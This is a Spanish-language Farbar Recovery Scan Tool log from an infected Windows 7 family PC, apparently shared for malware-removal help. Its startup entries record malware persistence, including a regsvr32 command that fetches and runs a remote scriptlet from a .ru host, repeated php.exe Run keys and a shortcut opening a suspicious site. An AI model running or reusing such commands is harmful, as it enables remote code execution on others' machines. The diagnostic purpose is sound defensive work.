FirewallRules: [UDP Query User{2FFF9BF0-13C8-42B3-A231-6751376620F7}C:\users\familia landaeta\documents\counter-strike source\hl2.exe] => (Allow) C:\users\familia landaeta\documents\counter-strike source\hl2.exe () [Archivo no firmado]
FirewallRules: [TCP Query User{8745764A-BC83-4F55-9171-A5982B40232C}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.159\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.159\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{989FF411-E4ED-4D70-9E3C-790F16DC0BA3}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.159\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.159\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{04C22F37-9603-465F-815E-37F38486F1DA}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.160\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.160\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{B89B45E2-2A53-4ED7-B129-917471B6306E}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.160\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.160\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{B1524B90-B864-4AFD-B78E-E5F599B537E8}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.161\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.161\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{E13FD752-7E41-4C11-9987-4358AE0CEC63}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.161\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.161\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{8F976A90-C687-4FD6-9141-889CAD57FB2D}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.162\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.162\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{03F47DD5-648D-4556-909F-25D7EE7A7C37}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.162\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.162\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{E53A12F1-9811-40B3-9BA4-93F39D80DB23}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.163\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.163\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{3C8F5781-51E6-489A-9E90-2D88477F13BD}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.163\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.163\deploy\leagueclient.exe Ningún archivo
FirewallRules: [{6F36F007-1CC6-4ECA-B760-A9D1CE361AC6}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
FirewallRules: [{19D3F512-6ED7-40DD-99CF-1132EC5054AF}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
FirewallRules: [{AE756314-D5F2-493A-A4B4-B2594BE5ECC8}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
==================== Puntos de Restauración =========================
==================== Dispositivos defectuosos en el Administrador de dispositivos ============
Name: Security Processor Loader Driver
Description: Security Processor Loader Driver
Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Manufacturer:
Service: spldr
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.
==================== Errores del registro de eventos: ========================
Errores de aplicación:
==================
Error: (04/20/2020 01:02:47 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.
Error: (04/20/2020 01:02:46 PM) (Source: PerfNet) (EventID: 2002) (User: )
Description: No se puede abrir el objeto de rendimiento del servicio del redirector. Los primeros cuatro bytes (DWORD) de la sección de datos contienen el código de estado.
Error: (04/20/2020 01:02:46 PM) (Source: PerfNet) (EventID: 2004) (User: )
Description: No se puede abrir el objeto de rendimiento del servicio del servidor. Los primeros cuatro bytes (DWORD) de la sección de datos contienen el código de estado.
Error: (04/20/2020 12:16:02 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Error al generar el contexto de activación para "C:\Windows\System32\systemcpl.dll".
No se encontró el ensamblado dependiente Microsoft.Windows.Common-Controls,language="*",processorArchitecture="*",publicKeyToken="436865772d574741",type="win32",version="6.0.0.0".
Use sxstrace.exe para obtener un diagnóstico detallado.
Error: (04/20/2020 09:22:10 AM) (Source: MsiInstaller) (EventID: 1024) (User: NT AUTHORITY)
Description: Producto: Adobe Acrobat Reader DC - Español - la actualización "Adobe Acrobat Reader DC
(19.010.20098)" no se pudo instalar. Código de error 1603. Windows Installer no puede crear registros para ayudar a solucionar problemas de instalación de paquetes de software. Use el vínculo siguiente para obtener instrucciones sobre la activación de la compatibilidad de registro: http://go.microsoft.com/fwlink/?LinkId=23127
Error: (04/20/2020 09:22:02 AM) (Source: MsiInstaller) (EventID: 11310) (User: NT AUTHORITY)
Description: Producto: Adobe Acrobat Reader DC - Español -- Error 1310. Error al escribir en el archivo C:\Program Files\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\AdobeHunspellPlugin.dll. Error del sistema 5. Compruebe que dispone de acceso a ese directorio.
Error: (04/20/2020 09:21:24 AM) (Source: MsiInstaller) (EventID: 10005) (User: NT AUTHORITY)
Description: Product: Adobe Refresh Manager -- Error 2203.Database: C:\Windows\Installer\1546f5.ipi. Cannot open database file. System error -2147287035.
Error: (04/20/2020 08:59:28 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.
Errores del sistema:
=============
Error: (04/20/2020 01:02:35 PM) (Source: DCOM) (EventID: 10005) (User: )
Description: Error de DCOM "1068" al intentar iniciar el servicio BITS con argumentos "" para ejecutar el servidor:
{4991D34B-80A1-4291-83B6-3328366B9097}
Error: (04/20/2020 01:02:33 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: El servicio Servicio de lista de redes depende del servicio Reconocimiento de ubicación de red, el cual no pudo iniciarse debido al siguiente error:
No se puede iniciar el servicio o grupo de dependencia.
Error: (04/20/2020 01:01:54 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: El servicio Servicio de lista de redes depende del servicio Reconocimiento de ubicación de red, el cual no pudo iniciarse debido al siguiente error:
No se puede iniciar el servicio o grupo de dependencia.
Error: (04/20/2020 01:01:50 PM) (Source: DCOM) (EventID: 10005) (User: )
Description: Error de DCOM "1084" al intentar iniciar el servicio VSS con argumentos "" para ejecutar el servidor:
{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}
Error: (04/20/2020 01:01:28 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: El servicio Servicio de lista de redes depende del servicio Reconocimiento de ubicación de red, el cual no pudo iniciarse debido al siguiente error:
No se puede iniciar el servicio o grupo de dependencia.
Error: (04/20/2020 01:01:28 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: El servicio Servicio de lista de redes depende del servicio Reconocimiento de ubicación de red, el cual no pudo iniciarse debido al siguiente error:
No se puede iniciar el servicio o grupo de dependencia.
Error: (04/20/2020 01:01:27 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: El servicio Servicio de lista de redes depende del servicio Reconocimiento de ubicación de red, el cual no pudo iniciarse debido al siguiente error:
No se puede iniciar el servicio o grupo de dependencia.
Error: (04/20/2020 01:01:27 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: El servicio Servicio de lista de redes depende del servicio Reconocimiento de ubicación de red, el cual no pudo iniciarse debido al siguiente error:
No se puede iniciar el servicio o grupo de dependencia.
Windows Defender:
===================================
Date: 2020-04-16 10:04:25.437
Description:
El examen de Windows Defender se detuvo antes de completarse.
Id. de examen:{D89403F0-B93D-475E-9BE2-D2E52245BCDF}
Tipo de examen:AntiSpyware
Parámetros de examen:Examen rápido
Usuario:FamiliaLandaeta\Familia Landaeta
==================== Información de la memoria ===========================
BIOS: American Megatrends Inc. 6.07 03/21/2011
Placa base: FOXCONN 2A8C
Procesador: Pentium(R) Dual-Core CPU E5800 @ 3.20GHz
Porcentaje de memoria en uso: 69%
RAM física total: 2013.24 MB
RAM física disponible: 613.74 MB
Virtual total: 4026.48 MB
Virtual disponible: 2617.72 MB
==================== Unidades ================================
Drive c: () (Fixed) (Total:148.95 GB) (Free:48.46 GB) NTFS
Drive d: (Audio CD) (CDROM) (Total:0 GB) (Free:0 GB) CDFS
\\?\Volume{459fd2d9-792a-11e6-a962-806e6f6e6963}\ (Reservado para el sistema) (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS
==================== MBR & Tabla de particiones ====================
==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 149.1 GB) (Disk ID: F362F362)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=149 GB) - (Type=07 NTFS)
==================== Final Addition.txt =======================
Resultado del análisis realizado por Farbar Recovery Scan Tool (FRST) (x86) Versión: 19-04-2020
Ejecutado por Familia Landaeta (administrador) sobre FAMILIALANDAETA (Hewlett-Packard HP 500B Microtower) (20-04-2020 13:02:58)
Ejecutado desde C:\Users\Familia Landaeta\Downloads
Perfiles cargados: Familia Landaeta (Perfiles disponibles: Familia Landaeta)
Platform: Microsoft Windows 7 Ultimate Service Pack 1 (X86) Idioma: Español (España, internacional)
Internet Explorer Versión 11 (Navegador predeterminado: Chrome)
Modo de Inicio: Safe Mode (minimal)
Tutorial para Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Procesos (Lista blanca) =================
(Si una entrada es incluida en el fixlist, el proceso será cerrado. El archivo no será movido.)
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
==================== Registro (Lista blanca) ===================
(Si una entrada es incluida en el fixlist, el elemento del registro será restaurado a su valor predeterminado o será eliminado. El archivo no será movido.)
HKLM\...\Run: [GrooveMonitor] => C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe [31016 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [601424 2018-07-07] (Oracle America, Inc. -> Oracle Corporation)
HKLM\...\Run: [XMouseButtonControl] => C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\XMouseButtonControl.exe [1346848 2020-02-09] (Open Source Developer, Phillip Gibbons -> Highresolution Enterprises)
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [Akamai NetSession Interface] => C:\Users\Familia Landaeta\AppData\Local\Akamai\netsession_win.exe [4586456 2018-04-17] (Akamai Technologies, Inc. -> Akamai Technologies, Inc.)
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server2.39slxu3bw.ru/restore.xml scrobj.dll <==== ATENCIÓN
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [wmwrdqj] => C:\Users\Familia Landaeta\AppData\Local\aoxfre\wyeynesru.exe [141824 2013-10-11] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [php0] => "C:\Users\Familia Landaeta\AppData\Local\php7\php.exe" "C:\Users\Familia Landaeta\AppData\Local\php7\php.php"
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [php1] => "C:\Users\Familia Landaeta\AppData\Local\php7\php.exe" "C:\Users\Familia Landaeta\AppData\Local\php7\php.php"
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [php2] => "C:\Users\Familia Landaeta\AppData\Local\php7\php.exe" "C:\Users\Familia Landaeta\AppData\Local\php7\php.php"
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [php3] => "C:\Users\Familia Landaeta\AppData\Local\php7\php.exe" "C:\Users\Familia Landaeta\AppData\Local\php7\php.php"
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [php4] => "C:\Users\Familia Landaeta\AppData\Local\php7\php.exe" "C:\Users\Familia Landaeta\AppData\Local\php7\php.php"
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [php5] => "C:\Users\Familia Landaeta\AppData\Local\php7\php.exe" "C:\Users\Familia Landaeta\AppData\Local\php7\php.php"
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [php6] => "C:\Users\Familia Landaeta\AppData\Local\php7\php.exe" "C:\Users\Familia Landaeta\AppData\Local\php7\php.php"
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [php7] => "C:\Users\Familia Landaeta\AppData\Local\php7\php.exe" "C:\Users\Familia Landaeta\AppData\Local\php7\php.php"
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [php8] => "C:\Users\Familia Landaeta\AppData\Local\php7\php.exe" "C:\Users\Familia Landaeta\AppData\Local\php7\php.php"
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [php9] => "C:\Users\Familia Landaeta\AppData\Local\php7\php.exe" "C:\Users\Familia Landaeta\AppData\Local\php7\php.php"
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Policies\Explorer: [TaskbarNoNotification] 0
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Policies\Explorer: [HideSCAHealth] 0
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\MountPoints2: {3ce42c48-38d5-11e8-849d-78acc0bd591b} - E:\Setup.exe
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\Mystify.scr [221184 2010-11-20] (Microsoft Windows -> Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\80.0.3987.163\Installer\chrmstp.exe [2020-04-16] (Google LLC -> Google LLC)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{A6EADE66-0000-0000-484E-7E8A45000000}] -> C:\Program Files\Adobe\Acrobat Reader DC\Esl\AiodLite.dll [2018-06-29] (Adobe Systems, Incorporated -> Adobe Systems, Inc.)
Startup: C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Recorte de pantalla e Inicio rápido de OneNote 2007.lnk [2016-10-06]
ShortcutTarget: Recorte de pantalla e Inicio rápido de OneNote 2007.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation -> Microsoft Corporation)
Startup: C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.lnk [2020-04-17]
ShortcutAndArgument: user.lnk -> C:\Windows\System32\cmd.exe => /c explorer hxxp://www2.savemax.store/
Startup: C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xiwlwq.lnk [2020-04-20]
ShortcutTarget: xiwlwq.lnk -> C:\Users\Familia Landaeta\AppData\Local\aoxfre\wyeynesru.exe (Microsoft Windows -> Microsoft Corporation)
BootExecute: autocheck autochk /p \??\F:autocheck autochk *
==================== Tareas programadas (Lista blanca) ============
(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)
Task: {1F3AC100-06D5-4A79-ACEB-822B7917AF2F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [154440 2016-09-12] (Google Inc -> Google Inc.)
Task: {268EE322-C696-4C2A-ADED-73EEE65E5919} - System32\Tasks\{33D029CD-E2EB-4BBF-840D-05EE30782182} => C:\Windows\system32\pcalua.exe -a "C:\Users\Familia Landaeta\Documents\Need for Speed Carbon\eauninstall.exe" -d "C:\Users\Familia Landaeta\Documents\Need for Speed Carbon"
Task: {4D752A87-53D3-4FDE-856C-14DA2FE85B25} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1195544 2018-12-16] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
Task: {4F752C9C-8039-4148-94E7-17E0424FB331} - System32\Tasks\{B578D2A0-8F24-4C93-B6F3-0E29139E5C47} => C:\Windows\system32\pcalua.exe -a "C:\Users\Familia Landaeta\Documents\Warcraft III\SetupReg.exe" -d "C:\Users\Familia Landaeta\Documents\Warcraft III"
Task: {65B18C1F-B953-43BD-B364-B3652C2ACD60} - System32\Tasks\{D3E37D6B-A5F9-4EBD-83FD-1DE5065FB775} => C:\Windows\system32\pcalua.exe -a "C:\Users\Familia Landaeta\Documents\Need for Speed Carbon\setup.exe" -d "C:\Users\Familia Landaeta\Documents\Need for Speed Carbon"
Task: {672FBA20-83CF-4151-8163-DE75916F4816} - System32\Tasks\{0C16381D-B4C5-4BFB-B0DE-23B539A738D3} => C:\Users\Familia Landaeta\Documents\counter strike\gta_sa.exe [14386176 2005-07-07] () [Archivo no firmado]
Task: {A6C8DED6-B773-4517-BF76-B6538CD4434C} - System32\Tasks\{FE65F450-8DDE-41FF-8B71-F2B53B14CB22} => C:\Windows\system32\pcalua.exe -a "C:\Users\Familia Landaeta\Desktop\Hitman 1\directx7\dxsetup.exe" -d "C:\Users\Familia Landaeta\Desktop\Hitman 1\directx7"
Task: {AB5506EA-16C8-46C4-9F8E-4B7ED9BA87EA} - System32\Tasks\{568A21DE-A13A-462D-94F2-3A85694880BF} => C:\Windows\system32\pcalua.exe -a C:\Users\FAMILI~1\AppData\Local\Temp\jre-8u161-windows-au.exe -d C:\Windows\system32 -c /installmethod=jau FAMILYUPGRADE=1 <==== ATENCIÓN
Task: {AD5C2F40-438A-4391-8C94-3D407E01EF45} - System32\Tasks\{8E6B5861-4FEB-40B7-AA9A-A940302A2D7E} => C:\Users\Familia Landaeta\Documents\counter strike\gta_sa.exe [14386176 2005-07-07] () [Archivo no firmado]
Task: {CCB34560-3404-4CE5-9DAB-6B46BCB23E2D} - System32\Tasks\{B9641373-3BD3-45E5-A647-78413E924EF2} => C:\Windows\system32\pcalua.exe -a "C:\Users\Familia Landaeta\Documents\HDGHDFG\Eidos Interactive\Pyro\Commandos\MPLAYER\mplaynow.exe" -d "C:\Users\Familia Landaeta\Documents\HDGHDFG\Eidos Interactive\Pyro\Commandos\MPLAYER"
Task: {D6A3E4BB-CBD0-4187-9DCC-3D6F403A10BE} - System32\Tasks\{57FB3682-2104-4F36-8579-4DC3DC47852F} => C:\Windows\system32\pcalua.exe -a "C:\Users\Familia Landaeta\Documents\DownloaderPWCZ\PWCZ_ClienteCompleto_v139\install.exe" -d "C:\Users\Familia Landaeta\Documents\DownloaderPWCZ\PWCZ_ClienteCompleto_v139"
Task: {DAD5D05F-49AA-4561-BCB6-CF36DEC9F03F} - System32\Tasks\{BDC282FB-7E2B-40AD-B6A1-10CE822F66CB} => C:\Windows\system32\pcalua.exe -a "C:\Users\Familia Landaeta\Desktop\Counter-Strike 1.6\unins000.exe" -d "C:\Users\Familia Landaeta\Desktop\Counter-Strike 1.6"
Task: {DC289D95-95B2-4999-9194-C785C844D430} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [154440 2016-09-12] (Google Inc -> Google Inc.)
Task: {E292CC29-6E23-428B-A8A9-8B353DCB0242} - System32\Tasks\{27B6EE2D-9F7D-4816-8664-F8C35923C977} => C:\Users\Familia Landaeta\Documents\counter strike\gta_sa.exe [14386176 2005-07-07] () [Archivo no firmado]
Task: {EB26897C-3B5C-4277-B0BC-C6842F8F6430} - System32\Tasks\{B695C6D3-B08B-4889-8983-0E883F2B1BD2} => C:\Users\Familia Landaeta\Documents\counter strike\gta_sa.exe [14386176 2005-07-07] () [Archivo no firmado]
Task: {EF2ECF57-BD80-471F-B663-4A9C03A36584} - System32\Tasks\{8C3C6385-93E2-4818-A124-0E0FECD10D73} => C:\Users\Familia Landaeta\Documents\counter strike\gta_sa.exe [14386176 2005-07-07] () [Archivo no firmado]
Task: {FB402BC5-78F6-4A55-937B-E6AEEE83C91C} - System32\Tasks\{71A43D0C-6750-4381-ACFE-5879AE010440} => C:\Users\Familia Landaeta\Documents\counter strike\gta_sa.exe [14386176 2005-07-07] () [Archivo no firmado]
(Si una entrada es incluida en el fixlist, el archivo de tarea (.job) será movido. El archivo que está siendo ejecutado por la tarea no será movido.)
Task: C:\Windows\Tasks\CCleaner Update.job => C:\Program Files\CCleaner\CCUpdate.exe
==================== Internet (Lista blanca) ====================
(Si un elemento es incluido en el fixlist, y éste pertenece al registro, será eliminado o restaurado a su valor predeterminado.)
Hosts: Hay más de una entrada en Hosts. Consulte la sección Hosts de Addition.txt
Tcpip\Parameters: [DhcpNameServer] 37.120.145.234 8.8.8.8
Tcpip\..\Interfaces\{6657F0B0-4452-44DD-8333-C6955B9AC142}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{6CBAB555-2BC9-4266-B7B7-0CBF840B2538}: [DhcpNameServer] 37.120.145.234 8.8.8.8
Tcpip\..\Interfaces\{7C7F7E39-7E43-45F1-9777-5354FEA74937}: [DhcpNameServer] 192.168.42.129
Internet Explorer:
==================
SearchScopes: HKU\S-1-5-21-1692793609-910991690-2205039242-1000 -> {2F3822DF-85FD-483C-B3AA-38ECD8118D39} URL = hxxps://ve.search.yahoo.com/search?p={searchTerms}&intl=ve&fr=yset_ie_syc_oracle&type=orcl_default&partnerexternal-oracle=external-oracle
BHO: E-Web Print -> {201CF130-E29C-4E5C-A73F-CD197DEFA6AE} -> C:\Program Files\Epson Software\E-Web Print\ewps_tb.dll [2014-11-27] (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll [2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_181\bin\ssv.dll [2018-07-26] (Oracle America, Inc. -> Oracle Corporation)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll [2016-09-12] (Google Inc -> Google Inc.)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_181\bin\jp2ssv.dll [2018-07-26] (Oracle America, Inc. -> Oracle Corporation)
Toolbar: HKLM - E-Web Print - {201CF130-E29C-4E5C-A73F-CD197DEFA6AE} - C:\Program Files\Epson Software\E-Web Print\ewps_tb.dll [2014-11-27] (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll [2016-09-12] (Google Inc -> Google Inc.)
Toolbar: HKU\S-1-5-21-1692793609-910991690-2205039242-1000 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll [2016-09-12] (Google Inc -> Google Inc.)
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll [2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
FireFox:
========
FF DefaultProfile: dqwbx6g2.default
FF ProfilePath: C:\Users\Familia Landaeta\AppData\Roaming\Mozilla\Firefox\Profiles\dqwbx6g2.default [2020-04-20]
FF Homepage: Mozilla\Firefox\Profiles\dqwbx6g2.default -> hxxp://www.google.com/
FF Extension: (Search and New Tab by Yahoo) - C:\Users\Familia Landaeta\AppData\Roaming\Mozilla\Firefox\Profiles\dqwbx6g2.default\Extensions\[email protected] [2017-04-10] [Heredado]
FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files\Epson Software\E-Web Print\Firefox Add-on
FF Extension: (E-Web Print) - C:\Program Files\Epson Software\E-Web Print\Firefox Add-on [2016-10-09] [Heredado] [no firmado]
FF Plugin: @java.com/DTPlugin,version=11.181.2 -> C:\Program Files\Java\jre1.8.0_181\bin\dtplugin\npDeployJava1.dll [2018-07-26] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.181.2 -> C:\Program Files\Java\jre1.8.0_181\bin\plugin2\npjp2.dll [2018-07-26] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @videolan.org/vlc,version=2.2.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN -> VideoLAN)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-06-29] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default [2020-04-20]
CHR NewTab: Default -> Not-active:"chrome-extension://dobeegjfclcaalnakkicjhgcbmjcghbp/newtab/newtab.html"
CHR DefaultSearchURL: Default -> hxxps://es.search.yahoo.com/search?p={searchTerms}&fr=yset_chr_syc_oracle&type=default
CHR DefaultSearchKeyword: Default -> Yahoo
CHR DefaultSuggestURL: Default -> hxxps://es.search.yahoo.com/sugg/ie?output=fxjson&command={searchTerms}&nResults=10
CHR Extension: (Presentaciones) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-02-08]
CHR Extension: (Documentos) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2018-02-08]
CHR Extension: (Google Drive) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-09-12]
CHR Extension: (YouTube) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-09-12]
CHR Extension: (TV Hero) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\dobeegjfclcaalnakkicjhgcbmjcghbp [2020-04-16]
CHR Extension: (Adobe Acrobat) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2020-04-16]
CHR Extension: (Hojas de cálculo) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-02-08]
CHR Extension: (Documentos de Google sin conexión) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-04-16]
CHR Extension: (Sistema de pagos de Chrome Web Store) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2020-04-16]
CHR Extension: (Gmail) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-05-07]
CHR Extension: (Chrome Media Router) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-04-17]
CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Guest Profile [2018-11-24]
CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1 [2018-11-24]
CHR Extension: (Presentaciones de Google) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-12-08]
CHR Extension: (Google Docs) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2016-12-08]
CHR Extension: (Google Drive) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-12-08]
